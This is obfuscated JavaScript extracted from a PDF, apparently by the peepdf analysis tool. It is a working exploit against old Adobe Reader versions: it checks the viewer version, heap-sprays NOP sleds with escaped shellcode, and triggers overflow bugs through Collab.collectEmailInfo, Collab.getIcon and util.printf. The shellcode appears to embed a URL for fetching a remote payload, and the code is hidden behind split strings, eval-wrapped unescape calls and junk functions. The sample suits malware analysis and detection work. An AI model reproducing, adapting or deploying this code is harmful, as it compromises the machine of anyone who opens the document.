// peepdf comment: Javascript code located in object 7 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u4343', '%u4343%u', '4343%u0', 'FEB%u33', '5B%u66', 'C9%u80B', '9%u8001%', 'uEF33%u', 'E243%uEB', 'FA%uE8', '05%uF', 'FEC%u', 'FFFF%u', '8B7F%uD', 'F4E%uE', 'FEF%u', '64EF%u', 'E3AF%u9F', '64%u42', 'F3%u9F', '64%u6E', 'E7%uEF0', '3%uEF', 'EB%u64E', 'F%uB903', '%u6187%', 'uE1A1%u', '0703%u', 'EF11%uEF', 'EF%uAA', '66%uB9E', 'B%u7787%', 'u6511%u0', '7E1%uEF1', 'F%uEFEF', '%uAA66%u', 'B9E7%uC', 'A87%u', '105F%u07', '2D%uEF0D', '%uEFEF%', 'uAA66%u', 'B9E3%', 'u0087', '%u0F2', '1%u07', '8F%uEF3B', '%uEFEF', '%uAA66%', 'uB9FF%u2', 'E87%u', '0A96%u0', '757%uEF', '29%uE', 'FEF%uA', 'A66%uA', 'FFB%uD76', 'F%u9A', '2C%u66', '15%uF7', 'AA%uE806', '%uEFE', 'E%uB1EF%', 'u9A66%', 'u64CB%uE', 'BAA%uEE', '85%u64', 'B6%uF7BA', '%u07B', '9%uEF6', '4%uEF', 'EF%u8', '7BF%uF5', 'D9%u9FC0', '%u780', '7%uEFEF', '%u66EF', '%uF3AA%', 'u2A64%u', '2F6C%u66', 'BF%uC', 'FAA%u10', '87%uEF', 'EF%uB', 'FEF%uA', 'A64%u8', '5FB%uB', '6ED%u', 'BA64%u0', '7F7%u', 'EF8E%uE', 'FEF%uA', 'AEC%u28', 'CF%uB3EF', '%uC191', '%u288A%', 'uEBAF', '%u8A97%u', 'EFEF%u9A', '10%u64', 'CF%uE3', 'AA%uEE85', '%u64B6%', 'uF7BA%u', 'AF07%u', 'EFEF%u', '85EF%u', 'B7E8%', 'uAAEC', '%uDCCB', '%uBC34', '%u10B', 'C%uCF9A', '%uBCBF', '%uAA6', '4%u85F', '3%uB6', 'EA%uBA64', '%u07F7%u', 'EFCC%u', 'EFEF%uEF', '85%u9A', '10%u64CF', '%uE7AA%', 'uED85%u', '64B6%u', 'F7BA%uFF', '07%uE', 'FEF%u85E', 'F%u64', '10%uFF', 'AA%uEE8', '5%u64B', '6%uF7B', 'A%uEF0', '7%uEFE', 'F%uAE', 'EF%uBD', 'B4%u0', 'EEC%u0E', 'EC%u0', 'EEC%u0', 'EEC%u036', 'C%uB5EB', '%u64BC', '%u0D35%u', 'BD18%u0', 'F10%u64B', 'A%u6403', '%uE792', '%uB264', '%uB9E3%', 'u9C64%u', '64D3%', 'uF19B', '%uEC97%u', 'B91C%u9', '964%uECC', 'F%uDC1C%', 'uA626', '%u42AE%u', '2CEC%', 'uDCB9%u', 'E019%u', 'FF51%u1', 'DD5%u', 'E79B%u', '212E%', 'uECE2%uA', 'F1D%u', '1E04%u11', 'D4%u9A', 'B1%uB5', '0A%u046', '4%uB564', '%uECCB', '%u8932%', 'uE364%u6', '4A4%uF3', 'B5%u32E', 'C%uEB64', '%uEC64%', 'uB12A%u', '2DB2%u', 'EFE7%', 'u1B07', '%u1011', '%uBA1', '0%uA3BD%', 'uA0A2%', 'uEFA1%u', '7468%u', '7074%u', '2F3A%', 'u772F%u7', '26F%u646', 'C%u69', '77%u6564', '%u752', 'D%u6173', '%u632E%', 'u6D6F%u', '772F%', 'u6265%u6', 'C61%u7', 'A69%u726', '5%u6C2F%', 'u6E61%u', '6964%u', '676E%u6', '52F%u657', '8%u702', 'E%u706', '8%u783F', '%u703D', '%u6664');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

